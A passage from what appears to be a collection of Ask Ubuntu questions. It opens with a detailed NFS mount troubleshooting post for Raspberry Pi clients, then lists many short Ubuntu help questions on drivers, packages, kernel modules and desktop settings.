/dev/mmcblk0p5 already mounted on /boot mount : tmpfs already mounted on /var/tmp mount : tmpfs already mounted on /var/log mount.nfs : timeout set for fri nov 15 07:27:02 2013 mount.nfs : trying text-based options 'vers=3 , rsize=8192 , wsize=8192 , nolock , addr=192.168.7.1' mount.nfs : prog 100003 , trying vers=3 , prot=6 mount.nfs : trying 192.168.7.1 prog 100003 vers 3 prot tcp port 2049 mount.nfs : prog 100005 , trying vers=3 , prot=17 mount.nfs : trying 192.168.7.1 prog 100005 vers 3 prot udp port 37300 mount.nfs : mount ( 2 ) : permission denied mount.nfs : access denied by server while mounting 192.168.7.1 : /home/raspi/documents/raspi/raspi verbose output2 : here is a more direct approach which isolates the mount to only the directory in question here : $ sudo mount -v -o `` vers=3 '' 192.168.7.1 : /home/raspi/documents/raspi/raspi /home/raspi/test mount : no type was given - i 'll assume nfs because of the colon mount.nfs : timeout set for fri nov 15 07:47:38 2013 mount.nfs : rpc.statd is not running but is required for remote locking . mount.nfs : either use '-o nolock ' to keep locks local , or start statd . mount.nfs : an incorrect mount option was specified i had come across this rpc.statd is not running but is required for remote locking error before , but all the googling in the world did not help me at all ... edit : chaos asked me to execute the following commands and display the results : first on the server : server $ sudo exportfs -rv exporting raspi1 : /home/raspi/documents/raspi/raspi exporting raspi2 : /home/raspi/documents/raspi/raspi exporting raspi3 : /home/raspi/documents/raspi/raspi exporting raspi4 : /home/raspi/documents/raspi/raspi exporting raspi5 : /home/raspi/documents/raspi/raspi exporting raspi6 : /home/raspi/documents/raspi/raspi exporting raspi7 : /home/raspi/documents/raspi/raspi exporting raspi8 : /home/raspi/documents/raspi/raspi exporting raspi9 : /home/raspi/documents/raspi/raspi exporting raspi10 : /home/raspi/documents/raspi/raspi exporting raspi11 : /home/raspi/documents/raspi/raspi exporting raspi12 : /home/raspi/documents/raspi/raspi exporting raspi13 : /home/raspi/documents/raspi/raspi exporting raspi14 : /home/raspi/documents/raspi/raspi exporting raspi15 : /home/raspi/documents/raspi/raspi exporting raspi16 : /home/raspi/documents/raspi/raspi exporting raspi17 : /home/raspi/documents/raspi/raspi exporting raspi18 : /home/raspi/documents/raspi/raspi exporting raspi19 : /home/raspi/documents/raspi/raspi exporting raspi20 : /home/raspi/documents/raspi/raspi exporting raspi21 : /home/raspi/documents/raspi/raspi exporting raspi22 : /home/raspi/documents/raspi/raspi exporting raspi23 : /home/raspi/documents/raspi/raspi exporting raspi24 : /home/raspi/documents/raspi/raspi exporting raspi25 : /home/raspi/documents/raspi/raspi exporting raspi26 : /home/raspi/documents/raspi/raspi exporting raspi27 : /home/raspi/documents/raspi/raspi exporting raspi28 : /home/raspi/documents/raspi/raspi exporting raspi29 : /home/raspi/documents/raspi/raspi exporting raspi30 : /home/raspi/documents/raspi/raspi exporting raspi5 : /home/raspi/downloads exporting 192.168.7.105 : /home/raspi/documents/raspi and then on the client client $ showmount -e 192.168.7.1 export list for 192.168.7.1 : /home/raspi/documents/raspi 192.168.7.105 /home/raspi/documents/raspi/raspi raspi30 , raspi29 , raspi28 , raspi27 , raspi26 , raspi25 , raspi24 , raspi23 , raspi22 , raspi21 , raspi20 , raspi19 , raspi18 , raspi17 , raspi16 , raspi15 , raspi14 , raspi13 , raspi12 , raspi11 , raspi10 , raspi9 , raspi8 , raspi7 , raspi6 , raspi5 , raspi4 , raspi3 , raspi2 , raspi1 /home/raspi/downloads raspi5 client $ sudo mount -a mount.nfs : access denied by server while mounting 192.168.7.1 : /home/raspi/documents/raspi/raspi client $ sudo tail -f /var/log/daemon.log 2 > & 1 nov 15 21:35:55 raspi5 dhclient : bound to 192.168.7.105 -- renewal in 250 seconds . nov 15 21:40:05 raspi5 dhclient : dhcprequest on eth0 to 192.168.7.1 port 67 nov 15 21:40:05 raspi5 dhclient : dhcpack from 192.168.7.1 nov 15 21:40:05 raspi5 dhclient : bound to 192.168.7.105 -- renewal in 294 seconds . nov 15 21:44:59 raspi5 dhclient : dhcprequest on eth0 to 192.168.7.1 port 67 nov 15 21:44:59 raspi5 dhclient : dhcpack from 192.168.7.1 nov 15 21:44:59 raspi5 dhclient : bound to 192.168.7.105 -- renewal in 262 seconds . nov 15 21:49:21 raspi5 dhclient : dhcprequest on eth0 to 192.168.7.1 port 67 nov 15 21:49:21 raspi5 dhclient : dhcpack from 192.168.7.1 nov 15 21:49:21 raspi5 dhclient : bound to 192.168.7.105 -- renewal in 273 seconds . edit 2 : chaos asked me to further execute the following commands and display the results : server $ ping raspi5 ping raspi5 ( 192.168.7.105 ) 56 ( 84 ) bytes of data . 64 bytes from raspi5 ( 192.168.7.105 ) : icmp_seq=1 ttl=64 time=0.699 ms 64 bytes from raspi5 ( 192.168.7.105 ) : icmp_seq=2 ttl=64 time=0.683 ms server $ sudo tail -f /var/log/daemon.log tail : can not open â/var/log/daemon.logâ for reading : no such file or directory here is my /etc/exports file on the server . as you can see i am trying to use its name as defined in /etc/hosts , its ip address , and i am also trying to different folders to export . all other lines i omitted as they are just duplicates of the last line , just redirected to different raspis . # /etc/exports : the access control list for filesystems which may be exported # to nfs clients . see exports ( 5 ) . # # example for nfsv2 and nfsv3 : # /srv/homes hostname1 ( rw , sync , no_subtree_check ) hostname2 ( ro , sync , no_subtree_check ) # # example for nfsv4 : # /srv/nfs4 gss/krb5i ( rw , sync , fsid=0 , crossmnt , no_subtree_check ) # /srv/nfs4/homes gss/krb5i ( rw , sync , no_subtree_check ) # /home/raspi/downloads raspi5 ( rw , sync , no_subtree_check , no_root_squash ) /home/raspi/documents/raspi/ 192.168.7.105 ( rw , sync , no_subtree_check , no_root_squash , fsid=0 ) /home/raspi/documents/raspi/raspi raspi5 ( rw , sync , no_subtree_check , no_root_squash , fsid=0 ) here is my /etc/fstab file on my raspi5 client proc /proc proc defaults 0 0 /dev/mmcblk0p5 /boot vfat defaults 0 2 /dev/mmcblk0p6 / ext4 defaults , noatime 0 1 # a swapfile is not a swap partition , so no using swapon|off from here on , use dphys-swapfile swap [ on|off ] for that # automatically mount the shared raspi folder ( s ) # remember that nfs4 is aids , so use nfs3 192.168.7.1 : /home/raspi/documents/raspi/raspi /home/raspi/ nfs nfsvers=3 , rsize=8192 , wsize=8192 , rw , auto , nolock 0 0 # move highly used directories to ram tmpfs /var/tmp tmpfs nodev , nosuid , size=50m 0 0 tmpfs /var/log tmpfs nodev , nosuid , size=50m 0 0 edit 3 : following some of the advice here i also set the insecure flag in exports , but to no avail , and here is the output of rpcinfo -p on the client and the server : client $ sudo rpcinfo -p program vers proto port service 100000 4 tcp 111 portmapper 100000 3 tcp 111 portmapper 100000 2 tcp 111 portmapper 100000 4 udp 111 portmapper 100000 3 udp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 53553 status 100024 1 tcp 60026 status server $ rpcinfo -p program vers proto port service 100000 4 tcp 111 portmapper 100000 3 tcp 111 portmapper 100000 2 tcp 111 portmapper 100000 4 udp 111 portmapper 100000 3 udp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 42430 status 100024 1 tcp 49377 status 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs 100227 2 tcp 2049 100227 3 tcp 2049 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100003 4 udp 2049 nfs 100227 2 udp 2049 100227 3 udp 2049 100021 1 udp 33106 nlockmgr 100021 3 udp 33106 nlockmgr 100021 4 udp 33106 nlockmgr 100021 1 tcp 47922 nlockmgr 100021 3 tcp 47922 nlockmgr 100021 4 tcp 47922 nlockmgr 100005 1 udp 50875 mountd 100005 1 tcp 53329 mountd 100005 2 udp 53583 mountd 100005 2 tcp 42062 mountd 100005 3 udp 36556 mountd 100005 3 tcp 39984 mountd edit 4 : further following some of the advice here i have gotten the following debugging logs : [ 2233.803852 ] nfsd : using /var/lib/nfs/v4recovery as the nfsv4 state recovery directory [ 2233.803885 ] nfsd : starting 90-second grace period ( net ffffffff81cd29c0 ) [ 3261.750455 ] nfsd : last server has exited , flushing export cache [ 3262.912654 ] nfsd : using /var/lib/nfs/v4recovery as the nfsv4 state recovery directory [ 3262.912688 ] nfsd : starting 90-second grace period ( net ffffffff81cd29c0 ) [ 5231.798334 ] nfsd : last server has exited , flushing export cache [ 5232.956633 ] nfsd : using /var/lib/nfs/v4recovery as the nfsv4 state recovery directory [ 5232.956668 ] nfsd : starting 90-second grace period ( net ffffffff81cd29c0 ) [ 5350.889640 ] nfsd : last server has exited , flushing export cache [ 5352.023534 ] nfsd : using /var/lib/nfs/v4recovery as the nfsv4 state recovery directory [ 5352.023577 ] nfsd : starting 90-second grace period ( net ffffffff81cd29c0 ) [ 5517.837425 ] nfsd : last server has exited , flushing export cache [ 5518.987793 ] nfsd : using /var/lib/nfs/v4recovery as the nfsv4 state recovery directory [ 5518.987826 ] nfsd : starting 90-second grace period ( net ffffffff81cd29c0 ) [ 56604.080162 ] netfilter messages via netlink v0.30 . [ 56707.453535 ] nfsd : last server has exited , flushing export cache [ 56708.605020 ] nfsd : using /var/lib/nfs/v4recovery as the nfsv4 state recovery directory [ 56708.605057 ] nfsd : starting 90-second grace period ( net ffffffff81cd29c0 ) [ 57338.926093 ] nfsd : laundromat service - starting [ 57338.926105 ] nfsd : laundromat_main - sleeping for 90 seconds [ 57363.216188 ] nfsd : freeing readahead buffers . [ 57363.216244 ] nfsd : last server has exited , flushing export cache [ 57364.351041 ] set_max_drc nfsd_drc_max_mem 6008832 [ 57364.354764 ] nfsd : creating service [ 57364.354771 ] nfsd : allocating 32 readahead buffers . [ 57364.356023 ] nfsd4_umh_cltrack_upcall : cltrack_prog is disabled [ 57364.356040 ] nfsd : using /var/lib/nfs/v4recovery as the nfsv4 state recovery directory [ 57364.356072 ] nfsd : starting 90-second grace period ( net ffffffff81cd29c0 ) [ 57364.369688 ] nfsd_dispatch : vers 3 proc 0 [ 57372.738225 ] nfsd_dispatch : vers 4 proc 0 [ 57372.753507 ] nfsd_dispatch : vers 4 proc 1 [ 57372.753521 ] nfsv4 compound op # 1/3 : 24 ( op_putrootfh ) [ 57372.755550 ] exp_export : export of invalid fs type . [ 57372.755679 ] found domain 192.168.7.105 , raspi5 [ 57372.755685 ] found fsidtype 1 [ 57372.755690 ] found fsid length 4 [ 57372.755695 ] path seems to be < > [ 57372.755722 ] nfsv4 compound op ffff8801a47ec080 opcnt 3 # 1 : 24 : status 2 [ 57372.755731 ] nfsv4 compound returned 2 [ 57372.779429 ] nfsd_dispatch : vers 3 proc 0 [ 57372.792595 ] exp_export : export of invalid fs type . edit 5 : i 've made some progress and have deduced the following it 's not a port issue as client can telnet into host telnet 192.168.7.1 2049 it 's probably not a network issue as the server can not even mount to itself the old version which supported ( and still supports ) mounting was running nfs-kernel-server 1:1.2.4-1 whereas the new server which does not support mounting is running nfs-kernel-server 1:1.2.8-2 the command sudo /etc/init.d/portmap restart works on the old server , but not the new server , which tells me that i am missing portmap on the new server . however , when i try to install it via sudo apt-get install portmap , it tells me note , selecting 'rpcbind ' instead of 'portmap ' , and thatrpcbind is already the newest version` edit 6 : here is the output of iptables -l on my server : chain input ( policy accept ) target prot opt source destination chain forward ( policy drop ) target prot opt source destination accept all -- anywhere anywhere ctstate related , established accept all -- anywhere anywhere log all -- anywhere anywhere log level warning chain output ( policy accept ) target prot opt source destination and the correct ports are open : client $ nmap -p0 192.168.7.1 starting nmap 6.00 ( http : //nmap.org ) at 2013-11-16 06:44 utc nmap scan report for raspiserver ( 192.168.7.1 ) host is up ( 0.0095s latency ) . not shown : 996 closed ports port state service 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 2049/tcp open nfs nmap done : 1 ip address ( 1 host up ) scanned in 1.55 seconds
377335	my ubuntu was so lame	i want to ask why my ubuntu was working to slow for everything when i was inputing data and see my email inbox it was always loading , sometimes it was hangs , not responding with requirement core2duo , ram 512mb and hdd 80gb do you have any solution for this problem ? thank you before
377336	cant install vlc player : problem with dependencies	i am having a problem with installing vlc player vlc : depends : vlc-nox ( = 2.0.5-0ubuntu0.12.04.1 ) but 2.0.5-0ubuntu0.12.04.1 is to be installed depends : libavcodec-extra-53 ( > = 4:0.8-1~ ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.8-1~ ) but 4:0.8.6ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10.4 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2.1 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.4 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.4 is to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not going to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is to be installed depends : libtar0 but it is not going to be installed depends : libva-x11-1 ( > 1.0.15~ ) but it is not going to be installed depends : libva1 ( > 1.0.15~ ) but it is not going to be installed depends : libxcb-keysyms1 ( > = 0.3. but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed what should i do ?
377338	what is the boot folder	what is the `` /boot '' folder in my ubuntu 12.04 installation ? specifically , should i include it in my backups ?
377339	keyboard stops working on ubuntu 11.04 but need to access data on the computer	i have an ubuntu 11.04 desktop , and my usb keyboard stopped working all of sudden . i tried rebooting , swapping usb port , swapping keyboard , vnc into it , but nothing helped . i dont have ps2 port on the computer either . now my computer is stuck at the log in screen , and i ca n't put in a password because the keyboard does n't work . i need to access data on the hard drive of the computer . what should i try ? if i connect the ( ubuntu ) hard drive to a windows desktop , will the windows desktop be able to access the information ? or will the hard drive be ruined ?
377340	run script at tty1 , but login at tty6	i created a live cd that runs a script at tty1 . i put the script in /etc/profile.d so it runs at boot . but this way the script also start at the other tty 's . i created the script that if the user will abort or press ctrl-c the machine wil reboot , so they cant access shell . i would like to enable login at tty6 for debug use . how do i do this ? thank you
377343	easy to use git server management	regarding source controls i have experience with tfs ( team foundation server ) and i 'm working with github for some of my open source projects . now i want to setup an authenticated git server on my own server . i 've read some guides but they seem a bit complicated to me , specially when i have to deal with authentication . i 'm looking for a simple and easy to setup/manage solution for that . for example a web package that allows me to manage users and projects on a git server . is there any ?
377344	how to disable unity panel focus keyboard shortcut alt+f1	i 'm using ubuntu 12.04 and trying to disable alt+f1 shortcut as i need it for usage in pycharm . i have already gone through how to disable alt-f1 / alt-f2 shortcuts ? . but it is not working for me . any idea what i 'm doing wrong . steps i have followed to disable alt+f1 : modified in dconf using the following command : gsettings set org.gnome.desktop.wm.keybindings panel-main-menu `` [ ] '' logged out and logged in . still alt+f1 sends keyboard focus to the unity panel . restarted the machine . still alt+f1 sends keyboard focus to the unity panel . also verified that the configuration is still set using the following command gsettings get org.gnome.desktop.wm.keybindings panel-main-menuoutput @ as [ ] environment : ubuntu 12.04.3 lts . and i do n't remember switching to unity 2d . but i think i 'm using unity 2d from this question
377347	wubi 12.04 does not recognize file system	i am a total newbie with linux , but was forced to install ubuntu on my work laptop . i chose wubi . it seems the installation was successful but i can not boot linux . what happens is , that when i choose to boot linux it goes directly to grub . when i type ls - it shows : memdisk , hd0 , hd0 , msdos1 , hd0 , msdos2 . apparently : hd0 , msdos1 is the hidden partition , which i made unhidden according to some clues i found in the net . hd0 , msdos2 is the c : disk , where both windows 7 and ubuntu are installed , but when i type ls hd0 , msdos2 i get feedback that it has no known filesystem . i did a chckdsk/f a couple of times and also reinstalled ubuntu a couple of times - nothing helped . the root.disk is in place and i can read-only browse its contents under windows . the hidden partition is 500 mb and the c : partition is 120 gb . both have ntfs . any ideas how i could resolve my problem ?
377349	how are events generated in linux ?	i am very new to linux . i was actually wondering how the application gets different system events . eg : 1 . a media player getting a button press notification 2 . battery charge low event i would love to know the complete sequence behind this . i searched a lot but did n't get expected results .
377351	error while transfering files between samsung galaxy chat & ubuntu 12.10 via usb	i have a galaxy chat b-5330 with android 4.1.2 when i connect it to my ubuntu pc via usb ( mtp option is selected ) , an error message is shown as follows . but the files are still shown by nautilus.it is considered as a camera . but i ca n't copy or move files from one device to other.an error message is shown again . i have tried using a card reader , but it is risky as my memory card can get corrupt ( it got twice ) and it means painstakingly coping files to memory card from internal memory , then to pc or vice versa . part 2 now while i use the other option in phone ( i.e ptp ) only images are shown and everything else is as above ( in short , does n't work ) . so any way in which i do n't have to remove that sd card out will do for me .
377353	what are the steps to deploy openstack in a vm using juju ?	i 'm looking for a guide to deploy openstack ( all in one ) in a small vm ( 2 cores , 2gb ram ) for development purposes , as well as for learning the juju process . what environment should i choose ? `` maas '' ? `` local '' ? if i choose `` maas '' - while bootstrapping , i get error 409 conflict - why ? i 've setup the mass-cli login , using the profile `` maas '' as instructed . do i need to add additional nodes ? can i add the node on which maas is already installed ? do i execute juju commands from the machine being the original `` maas '' machine ? i 've tried using juju-gui in a `` local '' environment . i 've followed the video from youtube on deploying openstack using juju , some of the components failed to install , their progress bars turned red - why ? where can i find the list of juju commands to deploy a single all in one node ? when deploying from commandline , how can i verify the installation 's progress/status ? watch juju status seems a bit uninformative for first time user . considering the above picture : is there a single openstack deployment spanning across multiple clusters ? or is there a single openstack deployment per cluster ?
377355	`` make '' command is not doing any thing	i am new to ubuntu and i am trying to compile a small program . i have a makefile and raw1394.c file in a folder raw1394 . when i run a make command it should produce raw1394.ko file but i am getting nothing in when i run make command . i also tried to compile raw1394.c file with gcc but it is giving me following error . raw1394.c:1:26 : fatal error : linux/module.h : no such file or directory compilation terminated could you please guide me how can i solve this problem . here is my makefie obj-m += raw1394.o all : make -c /lib/modules/ $ ( shell uname -r ) /build m= $ ( pwd ) modules clean : make -c /lib/modules/ $ ( shell uname -r ) /build m= $ ( pwd ) clean and here is my raw1394.c file # include < linux/module.h > # include < linux/kernel.h > int init_module ( void ) { printk ( kern_info `` loaded dummy raw1394 module\n '' ) ; return 0 ; } thank you . best regards nabeel
377359	why am i getting these undefined errors when i compile a c++ program in terminal ?	i have a c++ program that compiles and runs perfectly in code blocks . however when i try to compile it from the terminal using : gcc -g main.cpp -o main i get a lot of undefined references : and this is a screenshot of the program running in code blocks :
377361	reinstall ubuntu 12.04 preserving /home folder	note : there 's nothing wrong with my current setup . but i just wanted to reinstall ubuntu with clean state preserving my files /home . i know there are probably duplicate questions about this . but i have n't found yet answers to the questions since i seem to have a different setup by following the steps on dual booting here . to summarize the setup i followed on the tutorial that i followed . i created 4 partitions . /boot - where ubuntu is installed as opposed to installing it to / partition / /home swap then i use easybcd to let grub appear on boot menu . but there are questions that i 'm in need of answers regarding reinstalling ubuntu while preserving /home partition that i have n't found answers to with other tutorials . should i first remove grub from the boot menu using easybcd or other means before reinstalling ? since i installed ubuntu in /boot partion should i also format it . should i remove all my configuration files upon finishing the reinstallation process . thanks in advance . btw , i still consider myself a beginner when it comes to ubuntu so please bear with me : ) .
377362	which package provides libscalar.so ?	when i search for libscalar using apt-cache search , i only see perl-related packages . which ubuntu package contains the shared library libscalar.so ?
377364	how to fully change the color of the terminal prompt	i 've changed ~/.bashrc file of root and my own account . the problem is ( maybe because of my encypted home directory ) : when i log in to my normal account : no color , when i log in as root : color ! but then no direct access to encrypted directory . also when i log in to my normal account and type : su no ( no is my normal account username ) i get color ! where is the other place that color gets set ? i use ps1 all the time and change it based on what 's happening in my system ... its very nice , but when i log in as my normal account i do not get color . i 'm currently executing a one liner command to search every file for ps1= ( i 'm sure my command is wrong , but whatever ) : echo `` $ ( find * ) '' | xargs grep ps1 | grep ps1 correct command was : echo `` $ ( find * ) '' | xargs grep . * | grep ps1=
377368	multiple problems after fresh install	i did a fresh install of ubuntu 13.10 and at first everything seemed to be working fine , but now some problems are starting to rise up . every time i reboot ubuntu i am getting a `` system program problem detected '' . i have no idea what is causing this problem , the only thing i can do is send the report but i have no idea how i can see the report myself . every time i reboot my keyboard layout will be switched to qwerty ( english keyboard layout ) while on the top right corner it clearly says that i am on the belgian keyboard layout and not the english one . there is a `` be '' logo highlighted and not the `` en '' logo . however if re click the `` be '' logo the keyboard switches from qwerty to azerty ( from english to belgian keyboard layout ) i am having problems starting matlab and other programs from the terminal . when i installed matlab , all i had to do was type matlab and the program would start fine ( i created the link manually ) . then this would n't work anymore , i had to type matlab & to get control of the terminal back . same thing happened to other programs like `` kate '' , before just typing kate would work fine but later on i had to type kate & to get control back over the terminal and if i would close the terminal both matlab and kate would close down as well . now the problem with matlab has gotten even worse , first i have to sudo su and then i have to type matlab & for it to start properly , matlab never had any access problems and now they popped up out of nowhere .
377371	hello module using insmod err with invalid parameter , why ?	i am trying to load my first hello world module to my linux ( ubunutu 13.10 ) . everything is working fine ( make , etc . ) but when i try to load it to the kernel using the insmod utility . it says error : unbale to insert module : invalid parameter i am using utility like this insmod ./module.ko # include < linux/init.h > # include < linux/module.h > module_license ( `` gpl '' ) ; static int start ( void ) { printk ( kern_alert `` hello '' ) ; return 0 ; } static void end ( void ) { pritnk ( kern_alert `` good bye '' ) ; } module_init ( start ) ; module_exit ( end ) ; and my makefile is obj-m : = module.o all : make -c /lib/modules/ $ ( shell uname -r ) /build m= $ ( pwd ) module clean : make -c /lib/modules/ $ ( shell uname -r ) /build m= $ ( pwd ) clean
377373	how to install gvfs-mtp backend in ubuntu 12.10	as given on the launchpad page here ppa description these builds of gvfs have my native mtp backend backported from gvfs master . use this to easily access mtp based devices with nautilus . 13.10 ( saucy ) and newer versions of ubuntu contain all of these changes , so you do n't need to use this ppa any more . i 'm using ubuntu 12.10 , so i decided to install this package . so i first added the repository . aditya @ aditya-desktop : ~ $ sudo add-apt-repository ppa : langdalepl/gvfs-mtp and then sudo apt-get update but i do n't know what and how to install to get that package please tell me .
377374	gpu option is missing in blender 2.69	i am new learner of blender3d . i installed ubuntu two days ago , and was struggling installing my nvidia and blender on new os . after more than 15 times fresh installation and following help forum i was able to install but now i have a problem . my preference > system dose not show gpu option , ( once it woked yesterday but i ruined my installation trying to fix left mouse button issue ) . i am very new to linux , i know nothing about it . how can i fix this issue ? what i want to achieve is run blender and get the utmost performance of my hardware on linux ubuntu details of pc : i7 processor , with nvidia 640 graphic card . things i have done are : fresh install of ubuntu and then installation of nvidia driver sudo apt-get install nvidia-current then i installed blender sudo add-apt-repository ppa : irie/blender sudo apt-get update sudo apt-get install blender so , now my blender is working , but in the system preference it shows no cpu and when i go to render view , i do n't see the environment texture . only green and gray colors at back ground . i am in doubt weather if my nvidia is properly installed , or cuda installation is must to be done .
377378	wine will not display text during instalation of an app	i tried instaling an app through wine today and after opening the .exe file the installation wo n't display any text other than the one in the `` next '' , `` back '' or `` cancel '' buttons and when i get the window to maximum size it wo n't display even those . app 's name is archicad 13 , architecture software . running a 12.04 ubuntu distro .
377379	[ error ] can not access secondary gpu - error : could not load gpu driver	i am new to linux , i 'm using an gt 740m i am getting this error when i use optirun [ 55.478327 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 55.478372 ] [ error ] aborting because fallback start is disabled . driver this is how i installed bumblebee : sudo apt-get install bumblebee bumblebee-nvidia primus nvidia-319-updates nvidia-settings-319-updates i modified theses lines as it was recommanded : kerneldriver=nvidia_319_updates librarypath=/usr/lib/nvidia-319-updates : /usr/lib32/nvidia-319-updates xorgmodulepath=/usr/lib/nvidia-319-updates/xorg , /usr/lib/xorg/modules but bumbleblee is not working . how can i resolve this ? my bumblebee conf : http : //pastebin.com/rzjyuq41
377380	prevent user to delete firefox extension	is it possible to prevent non-root user to delete firefox extension ? i need to prevent from deleting firefox plugin block site . thank you in advance !
377382	how do i block file transfer to usb devices except for usb headphones ?	i want to block usb file transfer in my ubuntu os , but i am using usb headphones - so i want to block only file transfer to usb pendrives . how do i block file transfer to usb devices except for usb headphones ?
377383	have to run dropbox with `~/.dropbox-dist/dropboxd` , why not just dropbox ?	i 've had nemo file manager with the dropbox extension but after the problem of nemo 2.0 that could n't render the desktop properly , i removed both of them , and installed nautilus . now , i am trying to install dropbox with nautilus , when running sudo apt-get install nautilus-dropbox i am getting this : the following packages have unmet dependencies : nautilus-dropbox : depends : dropbox e : unable to correct problems , you have held broken packages . i followed the directions here but i am getting the above error . after that , i ran this cd ~ & & wget -o - `` http : //www.dropbox.com/download ? plat=lnx.x86_64 '' | tar xzf - as mentioned in the comments of the reply and successfuly ran dropbox daemon with this ~/.dropbox-dist/dropboxd . i know that to run dropbox from now on , i will create a new entry at the startup applications with this command ~/.dropbox-dist/dropboxd . but my question is , why ca n't i install it normally and run it with dropbox start command ?
377384	ubuntu shut down app	does anybody knows a good ubuntu shut down app or manager or commands ? i have gshutdown installed but there 's a lack of options i need more advanced one so i could shut it down automatically daily or once a week whatever , for example every day at 02:00 am .
377385	how can i get the mini displayport on my thinkpad to work in ubuntu 13.10 ?	i 've tried it before with 13.04 , and it did n't work then either . ubuntu simply does n't detect it . is there a driver or kernel that will let me use it ?
377389	how to easily start a webserver in any folder ?	i 'm looking for a relatively painless way to launch a web server with document root in any folder i specify ( or better yet , where i 'm launching ) . i often try out new things like js frameworks or so in a new folder somewhere here : /home/alexander/code/angularjs/ it would then be convenient to just go into this directory and type something like : start-webserver-here so that a web server starts listening on port 80 and serving this directory , and i can try out whatever i 'm working on . i 've installed xampp but it seems that it 's basic apache with a document root i 'd have to change , with root privileges even , along with granting permissions for every folder etc . is there an easier way ?
377390	kaspersky gui for ubuntu 13.04	can you help me with this issue ? it 's possible to run kaspersky on ubuntu 13.04 ?
377391	boot problem after an update	i 've ubuntu 12.04 installed along with windows 7 . after a long list of updates including the graphic card update ( geforce - i think the update was geforce 306 ) , ubuntu fails to boot . it will only give me a black screen and ask for log in user name and password and stays on the black screen . moreover , it will not accept any username or password .
377392	how can i enable brightness hot-keys on ubuntu 13.10 running on a toshiba l850 ?	how can i enable brightness hot-keys on ubuntu 13.10 running on a toshiba l850 ? i see threads mentioning that you add a line to menu.lst and a few others about different packages but none seem to work for me . can anyone shed some light on this ?
377393	key for switching between windows of the same application	i am wondering where the keyboard short cut for switching between windows of the same application is defined . i am using ubuntu 12.04 . currently i can press alt+| to switch between windows . in system settings- > keyboard- > shortcuts- > navigation i have the following screenshot as seen , there is no item for the current window , whereas there is an item for `` switch windows of an application '' , which is disabled . pressing and holding down the `` super '' key shows that `` alt+| '' is bound to `` switch windows of current application '' .. in `` compizconfig settings manager- > window management- > static application switcher '' i get the following screenshot : as seen , there is no key bound to `` next window ( group ) '' .. i find this rather confusing.. what is the relation between compiz and `` system settings- > keyboard '' ? why is the key not showing up in either compiz nor `` system settings '' ? how can i ( preferably ) change the keyboard setting for this task ? see also : how do i disable or change the `` alt+` `` shortcut to switch between multiple windows of a single application ?
377395	what is the state of the ubuntu usb 3.0 driver	i have a device , that over usb 3.0 enumerates as a speaker and a microphone ( two interfaces , each with a single endpoint ) under windows 7 . however , under ubuntu 13.04 , only the speaker shows up . how do i determine if the problem is in the audioclass driver , usb 3.0 driver or the device ?
377397	is it possible to use juju on maas nodes not connected to internet ?	at present i 'm testing ubuntu juju with maas nodes , on a 12.04 server . for this i 'm using virtual boxes . actually , i am wondering if it possible to deploy juju charms on maas nodes which does not have any kind of access to the internet . for this use case , i 'm thinking of a local ubuntu mirror for maas nodes commisioning , and locally stored juju charms for service deployment . is it enough to have a fully disconnected maas cluster ?
377400	working with filezilla on ubuntu server and client	in our concern we are using ubuntu as a local server and client as well clients need to upload file from local client to server in that case we are plan to use filezilla but in that local server can not be connected i do n't no why is there is any way to upload local file to server . explain me if there is any way .
377402	create virtual card with alsa	i want to create a virtual sound card to play sound with applications on it ( e.g . moc or mpd ) , and call it e.g . vcard the output of the vcard should be in the input ( mic ) of my physical sound card , so that when i adjust the mic-sound-level in alsa on the physical card , the sound should be reduced . i have a ubuntu 12.04 server box and a running instance of either mpd or moc
377403	can not add gedit plugin	here i found a nice gedit plugin that i decided to install . the instructions on this page are based on the old ubuntu versions , so i tried another way : i downloaded the plugin , unpacked it , renamed the file intelligent_text_completion.gedit-plugin to intelligent_text_completion.plugin , moved them to /usr/lib/gedit/plugins ( the other file is intelligent_text_completion.py ) . i restarted gedit , but when i go to edit- > preferences- > plugins , there 's no that plugin .
377404	bluetooth not finding devices with 13.10 on t420	i was using a bluetooth mouse with my t420 laptop and then one fine day it stopped finding it and i am still trying to find the bug . i can see bluetooth in lsmod and rfkill list gives 0 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : no 1 : tpacpi_wwan_sw : wireless wan soft blocked : no hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no 8 : hci0 : bluetooth soft blocked : no hard blocked : no any inference from bluetooth in both hci0 and tpacpi_bluetooth_sw ? thanks a lot ,
377405	kvm guest priority starting	i have 2 guests on my kvm virtual machine manager ( debian1 and debian2 ) . i need to start debian1 always first , so i want disable starting debian2 before debian1 . is it possible ? how can i make it ? thanks
377406	libx11-dev ' has no installation candidate	i am new to ubuntu , i am using ubuntu 13.10 , and trying to install ns-2 . during the installation i am facing the following error ; x11/xlib.h : no such file or directory then i tried to install sudo apt-get install libx11-dev this time i am facing the following error : reading package lists ... done building dependency tree reading state information ... done package libx11-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libx11-dev ' has no installation candidate i have no idea how to deal it , please help thanks in advance
377410	tor location problem	i had freshly installed ubuntu 13.10 64 bit then i installed tor from the software center when i try to open it i get the following when i press show settings i get `` /usr/sbin/tor '' in the `` start tor software when vidalia starts '' option i tried this : $ sudo add-apt-repository ppa : upubuntu-com/tor64 $ sudo apt-get update $ sudo apt-get install tor-browser i got cant find package error please make your answer detailed cuz i 'm new to linux any ideas ?
